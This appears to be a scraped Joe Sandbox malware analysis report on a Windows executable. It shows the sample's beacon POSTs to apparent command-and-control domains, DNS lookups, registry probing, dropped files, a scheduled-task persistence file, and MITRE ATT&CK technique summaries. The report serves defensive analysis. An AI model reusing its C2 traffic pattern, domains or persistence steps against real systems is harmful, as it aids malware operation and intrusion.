Source: global traffic	HTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Source: global traffic	HTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49805
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49990

Source: global traffic	DNS traffic detected: DNS query: moviecentral-petparade.com
Source: global traffic	DNS traffic detected: DNS query: moviecentral-petparade2.com
Source: global traffic	DNS traffic detected: DNS query: moviecentral-petparade3.com

Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\cckrnaa

C:\Users\user\AppData\Local\Temp\d2d22b7a

C:\Users\user\AppData\Local\Temp\d3e71663

C:\Users\user\AppData\Local\Temp\dc28f109

C:\Users\user\AppData\Local\Temp\dcbc2b90

C:\Users\user\AppData\Local\Temp\dcc83b80

C:\Users\user\AppData\Local\Temp\dd72ccef

C:\Users\user\AppData\Local\Temp\djivmxg

C:\Users\user\AppData\Local\Temp\pbxllkvlhugf

C:\Windows\Tasks\ServiceHub Controller.job

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Windows Analysis Report
BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Function 0063251D Relevance: 1.6, APIs: 1, Instructions: 123
nativeCOMMON

Function 00632C3D Relevance: 4.0, APIs: 2, Instructions: 995
memoryCOMMON

Function 00633A4D Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 204
COMMON

Function 00631DFD Relevance: 3.1, APIs: 2, Instructions: 79
fileCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre